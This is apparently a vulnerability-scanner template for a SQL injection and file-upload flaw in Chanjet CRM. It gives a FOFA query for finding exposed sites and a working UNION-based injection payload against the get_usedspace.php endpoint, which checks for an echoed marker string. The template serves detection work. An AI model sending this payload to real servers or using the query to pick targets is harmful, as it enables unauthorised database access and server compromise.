id: chanjet-crm-get-usedspace-sql-injection

info:
  name: 畅捷CRM SQL注入+后台文件上传漏洞
  author: daffainfo
  severity: high
  verified: true
  description: |
    畅捷CRM是面向小企业全力打造的简单、实用的客户关系管理应用!畅捷CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入和后台文件上传漏洞，攻击者可以通过上传木马执行任意命令，获取服务器管理权限。
    fofa-query: title="畅捷CRM"
  reference:
    - https://mp.weixin.qq.com/s/ZjjXqN1RDeOQIH9ueTPymQ

rules:
  r0:
    request:
      method: GET
      path: /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x6f6c6436,0x6f6c6436,0x6f6c6436)--
    expression: response.status == 200 && response.body.bcontains(b'old6old6old6')
expression: r0()